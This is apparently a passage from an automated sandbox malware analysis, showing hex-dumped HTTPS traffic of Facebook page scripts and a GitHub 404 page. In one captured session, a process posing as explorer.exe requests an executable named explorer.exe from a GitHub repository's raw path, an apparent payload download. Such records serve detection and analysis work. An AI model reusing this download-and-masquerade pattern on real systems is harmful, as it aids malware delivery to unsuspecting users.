2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72
                                                                                                                                  Data Ascii: origin="anonymous" nonce="BgTs8qFM" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yX/r/lwJdNrJ0mJk.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous" nonce="BgTs8qFM" /><link rel="preload" href="https://static.xx.fbcdn.net/r
                                                                                                                                  2022-10-17 20:07:09 UTC432INData Raw: 63 2e 70 68 70 2f 76 33 2f 79 6e 2f 6c 2f 30 2c 63 72 6f 73 73 2f 6b 69 5f 57 4f 5a 50 46 51 59 58 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 5f 5f 62 69 67 50 69 70 65 43 74 6f 72 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 42 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 42 69 67 50 69 70 65 29 7b 64 65 66 69 6e 65 28 22 5f 5f 62 69 67 50 69 70 65 22 2c 5b 5d 2c 77 69 6e 64 6f 77 2e 62 69 67 50 69 70 65 3d 6e 65 77 20 42 69 67 50 69 70 65 28 7b 22 66 6f 72 63 65 46 69 6e 69 73 68 22 3a 74 72 75 65 2c 22 63 6f 6e 66 69 67 22 3a 7b
                                                                                                                                  Data Ascii: c.php/v3/yn/l/0,cross/ki_WOZPFQYX.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><script>window.__bigPipeCtor=now_inl();requireLazy(["BigPipe"],function(BigPipe){define("__bigPipe",[],window.bigPipe=new BigPipe({"forceFinish":true,"config":{
                                                                                                                                  2022-10-17 20:07:09 UTC433INData Raw: 74 3e 0d 0a 31 38 36 31 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 42 67 54 73 38 71 46 4d 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 6c 61 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 42 67 54 73 38 71 46 4d 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 6f 6e 50 61 67 65
                                                                                                                                  Data Ascii: t>1861<script nonce="BgTs8qFM">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("last_response",n);})})();</script><script nonce="BgTs8qFM">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPage
                                                                                                                                  2022-10-17 20:07:09 UTC435INData Raw: 6a 51 36 42 75 76 34 63 45 66 53 76 6c 6a 77 51 69 6b 6b 53 71 6b 62 54 5a 37 57 36 47 6e 52 48 49 52 41 58 69 4c 77 45 55 6e 4f 35 36 69 68 47 6c 45 62 50 64 37 35 50 45 78 33 37 76 53 6f 33 61 59 78 7a 61 4f 50 6f 67 7a 4c 5a 62 34 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 36 22 2c 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 2c 22 41 61 33 42 34 38 74 6f 30 75 41 44 70 6a 51 36 42 75 76 34 63 45 66 53 76 6c 6a 77 51 69 6b 6b 53 71 6b 62 54 5a 37 57 36 47 6e 52 48 49 52 41 58 69 4c 77 45 55 6e 4f 35 36 69 68 47 6c 45 62 50 64 37 35 50 45 78 33 37 76 53 6f 33 61 59 78 7a 61 4f 50 6f 67 7a 4c 5a 62 34 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 37 22 2c
                                                                                                                                  Data Ascii: jQ6Buv4cEfSvljwQikkSqkbTZ7W6GnRHIRAXiLwEUnO56ihGlEbPd75PEx37vSo3aYxzaOPogzLZb4"]},-1],["cr:1083116",["XAsyncRequest"],{__rc:["XAsyncRequest","Aa3B48to0uADpjQ6Buv4cEfSvljwQikkSqkbTZ7W6GnRHIRAXiLwEUnO56ihGlEbPd75PEx37vSo3aYxzaOPogzLZb4"]},-1],["cr:1083117",
                                                                                                                                  2022-10-17 20:07:09 UTC436INData Raw: 56 31 54 68 4f 69 5a 65 6a 5f 32 64 67 31 63 4b 38 49 2d 66 75 66 35 51 75 5a 58 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 42 61 6e 7a 61 69 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 4d 41 58 5f 53 49 5a 45 3a 31 30 30 30 30 2c 4d 41 58 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 4d 49 4e 5f 57 41 49 54 3a 6e 75 6c 6c 2c 52 45 53 54 4f 52 45 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 62 6c 61 63 6b 6c 69 73 74 3a 5b 22 74 69 6d 65 5f 73 70 65 6e 74 22 5d 2c 64 69 73 61 62 6c 65 64 3a 66 61 6c 73 65 2c 67 6b 73 3a 7b 62 6f 6f 73 74 65 64 5f 70 61 67 65 6c 69 6b 65 73 3a 74 72 75 65 2c 6d 65 72 63 75 72 79 5f 73 65 6e 64 5f 65 72 72 6f 72 5f 6c 6f 67 67 69 6e 67 3a 74 72 75 65 2c 70 6c 61 74 66 6f 72 6d 5f 6f 61 75 74 68 5f 63 6c 69 65 6e 74 5f 65 76 65 6e 74 73 3a 74 72 75 65 2c
                                                                                                                                  Data Ascii: V1ThOiZej_2dg1cK8I-fuf5QuZXw"]},-1],["BanzaiConfig",[],{MAX_SIZE:10000,MAX_WAIT:150000,MIN_WAIT:null,RESTORE_WAIT:150000,blacklist:["time_spent"],disabled:false,gks:{boosted_pagelikes:true,mercury_send_error_logging:true,platform_oauth_client_events:true,
                                                                                                                                  2022-10-17 20:07:09 UTC437INData Raw: 45 4c 6e 59 75 7a 43 4d 68 37 6d 37 59 74 70 7a 5a 52 43 66 35 41 72 62 46 42 67 72 4a 56 61 36 44 73 4d 2d 36 66 72 45 53 6c 71 4e 6c 47 65 42 4c 6f 65 4e 4c 4c 36 7a 67 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 33 38 34 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 32 4e 30 6a 33 47 56 6b 65 6e 66 6f 6f 33 61 58 33 71 5a 53 58 4b 44 6f 32 38 4a 56 4b 74 74 72 6c 59 79 36 67 79 4b 7a 73 4e 62 72 67 70 50 30 61 72 76 4d 56 31 54 68 4f 69 5a 65 6a 5f 32 64 67 31 63 4b 38 49 2d 66 75 66 35 51 75 5a 58 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 33 34 34 34 38 37 22 2c 5b 22 52 65 61 63 74 44 4f 4d 46 6f 72 6b 65 64 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 46 6f 72 6b 65 64 2d 70
                                                                                                                                  Data Ascii: ELnYuzCMh7m7YtpzZRCf5ArbFBgrJVa6DsM-6frESlqNlGeBLoeNLL6zgQ"]},-1],["cr:983844",[],{__rc:[null,"Aa2N0j3GVkenfoo3aX3qZSXKDo28JVKttrlYy6gyKzsNbrgpP0arvMV1ThOiZej_2dg1cK8I-fuf5QuZXw"]},-1],["cr:1344487",["ReactDOMForked-prod.classic"],{__rc:["ReactDOMForked-p
                                                                                                                                  2022-10-17 20:07:09 UTC439INData Raw: 78 7a 61 4f 50 6f 67 7a 4c 5a 62 34 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 37 31 35 39 22 2c 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 2c 22 41 61 33 42 34 38 74 6f 30 75 41 44 70 6a 51 36 42 75 76 34 63 45 66 53 76 6c 6a 77 51 69 6b 6b 53 71 6b 62 54 5a 37 57 36 47 6e 52 48 49 52 41 58 69 4c 77 45 55 6e 4f 35 36 69 68 47 6c 45 62 50 64 37 35 50 45 78 33 37 76 53 6f 33 61 59 78 7a 61 4f 50 6f 67 7a 4c 5a 62 34 22 5d 7d 2c 2d 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 41 63 74 69 76 65 53 65 63 6f 6e 64 73 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 73 61 6d 70 6c 69 6e 67 5f 72 61 74 65 3a 30 7d 2c 34 32 33 5d 5d 2c 72 65 71 75 69 72 65 3a 5b 5b 22 0d 0a
                                                                                                                                  Data Ascii: xzaOPogzLZb4"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa3B48to0uADpjQ6Buv4cEfSvljwQikkSqkbTZ7W6GnRHIRAXiLwEUnO56ihGlEbPd75PEx37vSo3aYxzaOPogzLZb4"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["
                                                                                                                                  2022-10-17 20:07:09 UTC439INData Raw: 39 64 31 0d 0a 42 44 43 6c 69 65 6e 74 53 69 67 6e 61 6c 43 6f 6c 6c 65 63 74 69 6f 6e 54 72 69 67 67 65 72 22 2c 22 73 74 61 72 74 53 69 67 6e 61 6c 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 5b 5d 2c 5b 7b 73 63 3a 22 7b 5c 22 74 5c 22 3a 31 36 35 39 30 38 30 33 34 35 2c 5c 22 63 5c 22 3a 5b 5b 33 30 30 30 30 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 30 31 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 30 32 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 30 33 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 30 34 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 30 35 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 30 36 2c 35 37 33 35 38 35 5d 2c 5b 33 30 30 30 37 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 30 38 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 31 32 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 31 33 2c 38 33
                                                                                                                                  Data Ascii: 9d1BDClientSignalCollectionTrigger","startSignalCollection",[],[{sc:"{\"t\":1659080345,\"c\":[[30000,838801],[30001,838801],[30002,838801],[30003,838801],[30004,838801],[30005,838801],[30006,573585],[30007,838801],[30008,838801],[30012,838801],[30013,83
                                                                                                                                  2022-10-17 20:07:09 UTC441INData Raw: 73 65 72 22 5d 5d 5d 7d 2c 68 73 72 70 3a 7b 68 73 64 70 3a 7b 63 6c 70 44 61 74 61 3a 7b 22 31 37 34 33 30 39 35 22 3a 7b 72 3a 31 2c 73 3a 31 7d 2c 22 31 38 37 31 36 39 37 22 3a 7b 72 3a 31 2c 73 3a 31 7d 2c 22 31 38 32 39 33 31 39 22 3a 7b 72 3a 31 7d 2c 22 31 38 32 39 33 32 30 22 3a 7b 72 3a 31 7d 2c 22 31 38 34 33 39 38 38 22 3a 7b 72 3a 31 7d 7d 2c 67 6b 78 44 61 74 61 3a 7b 22 31 36 35 32 38 34 33 22 3a 7b 72 65 73 75 6c 74 3a 66 61 6c 73 65 2c 68 61 73 68 3a 22 41 54 36 75 68 39 4e 57 52 59 34 51 45 51 6f 59 30 61 4d 22 7d 7d 7d 2c 68 62 6c 70 3a 7b 63 6f 6e 73 69 73 74 65 6e 63 79 3a 7b 72 65 76 3a 31 30 30 36 34 30 32 37 31 31 7d 2c 72 73 72 63 4d 61 70 3a 7b 7a 50 59 6c 54 79 6c 3a 7b 74 79 70 65 3a 22 6a 73 22 2c 73 72 63 3a 22 68 74 74 70 73
                                                                                                                                  Data Ascii: ser"]]]},hsrp:{hsdp:{clpData:{"1743095":{r:1,s:1},"1871697":{r:1,s:1},"1829319":{r:1},"1829320":{r:1},"1843988":{r:1}},gkxData:{"1652843":{result:false,hash:"AT6uh9NWRY4QEQoY0aM"}}},hblp:{consistency:{rev:1006402711},rsrcMap:{zPYlTyl:{type:"js",src:"https


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  6192.168.2.549707140.82.121.3443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:12 UTC442OUTGET /testermanmag/myownre/raw/main/explorer.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: github.com
                                                                                                                                  2022-10-17 20:07:12 UTC442INHTTP/1.1 404 Not Found
                                                                                                                                  Server: GitHub.com
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:12 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                  X-Frame-Options: deny
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                  Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                                                                  Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                  2022-10-17 20:07:12 UTC442INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                  Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
                                                                                                                                  2022-10-17 20:07:12 UTC444INData Raw: 31 38 37 45 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 3e 0a 20
                                                                                                                                  Data Ascii: 187E<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com">
                                                                                                                                  2022-10-17 20:07:12 UTC445INData Raw: 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 0a 0a 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a
                                                                                                                                  Data Ascii: mages.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https:
                                                                                                                                  2022-10-17 20:07:12 UTC446INData Raw: 65 6d 65 3d 22 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 2d 63 64 64 38 38 66 31 34 36 62 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74
                                                                                                                                  Data Ascii: eme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-cdd88f146bf7.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet
                                                                                                                                  2022-10-17 20:07:12 UTC447INData Raw: 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6e 76 69 72 6f 6e 6d 65 6e 74 2d 30 31 39 61 64 38 61 61 65 61 62 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73
                                                                                                                                  Data Ascii: </script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-019ad8aaeab3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https
                                                                                                                                  2022-10-17 20:07:12 UTC449INData Raw: 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 65 2d 61 74 74 61 63 68 6d 65 6e 74 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 74 65 72 2d 2d 36 61 35 62 66 66 2d 39 33 65 64 64 31 38 64 61 62 31 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f
                                                                                                                                  Data Ascii: lication/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_filter--6a5bff-93edd18dab1d.js"></script><script crossorigin="anonymous" defer="defer" type="applicatio
                                                                                                                                  2022-10-17 20:07:12 UTC450INData Raw: 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 79 64 72 6f 2d 61 6e 61 6c 79 74 2d 66 36 39 35 30 32 2d 36 35 61 30 32 32 39 30 37 33 30 32 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 74 65 72 2d 69 6e 70 75 74 2d 65 6c 65 6d 65 6e 74 5f 64 69 73
                                                                                                                                  Data Ascii: m_dimensions_js-node_modules_github_hydro-analyt-f69502-65a022907302.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dis
                                                                                                                                  2022-10-17 20:07:12 UTC450INData Raw: 45 37 38 32 0d 0a 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 75 70 64 61 74 61 62 6c 65 2d 63 6f 6e 74 65 6e 74 5f 74 73 2d 36 32 64 66 31 33 30 39 32 31 33 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70
                                                                                                                                  Data Ascii: E782n="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-62df1309213c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascrip
                                                                                                                                  2022-10-17 20:07:12 UTC452INData Raw: 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 61 74 61 6c 79 73 74 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 30 36 66 66 35 33 33 2d 62 30 31 33 31 36 37 35 34 65 32 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68
                                                                                                                                  Data Ascii: //github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff533-b01316754e20.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://gith
                                                                                                                                  2022-10-17 20:07:12 UTC453INData Raw: 68 30 77 76 61 61 67 4c 4b 41 56 57 71 38 62 62 65 4e 77 6e 5a 5a 4b 31 72 31 58 51 79 73 58 33 78 75 72 4c 55 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 7a 68 56 79 45 46 77 62 37 77 33 65 30 2d 75 4f 54 6c 74 6d 38 4a 73 63 6b 32 46 35 53 74 56 69 68 44 30 65 78 77 32 66 73 41 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 58 73 35 4b 6f 55 55 6b 4e 43 6f 61 41 5a 6e 37 77 50 4e 2d 74 30 31 50 79 77 70 39 4d 33 73 45 6a 6e 74 5f 33 5f 5a 57 50 63 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65
                                                                                                                                  Data Ascii: h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site
